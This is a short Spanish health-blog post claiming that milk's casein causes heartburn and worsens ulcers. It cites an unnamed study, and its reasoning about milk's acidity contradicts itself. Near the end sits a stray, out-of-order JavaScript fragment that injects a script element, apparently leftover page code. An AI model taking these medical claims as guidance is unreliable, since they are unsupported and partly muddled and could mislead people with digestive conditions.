Salud y belleza » Productos peligrosos, Salud, alimentos

Por qué la leche causa acidez

Sin Comentarios

Para muchas personas la leche es una bebida diaria indispensable y la consumen cada día. Además, durante muchos años los médicos aseguraban que beber leche era bueno para aliviar las úlceras duodenales o la indigestión porque se pensaba que tenía un grado de acidez más elevado que el de nuestro estómago. Sin embargo, en una investigación han descubierto que causa justo el efecto contrario, que la leche causa acidez por culpa de una proteína que contiene denominada caseína.

leche-perjudicial

La leche proporciona un revestimiento al estómago que provoca alivio temporal en personas con úlceras, pero una vez que se pasa el efecto, el malestar continúa e incluso puede llegar a empeorar, y no tiene nada que ver que la leche sea desnatada o entera.

Los médicos recomiendan beber leche si no tienes úlceras, pero tampoco es aconsejable que lo hagas en grandes cantidades ya que si bebes mucha leche puedes aumentar los riesgos de padecer una úlcera.

Así que ya sabes, si sufres úlceras, acidez estomacal o problemas digestivos debes considerar el eliminar la leche de tu dieta.

¿Te provoca la leche problemas digestivos o acidez?

d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.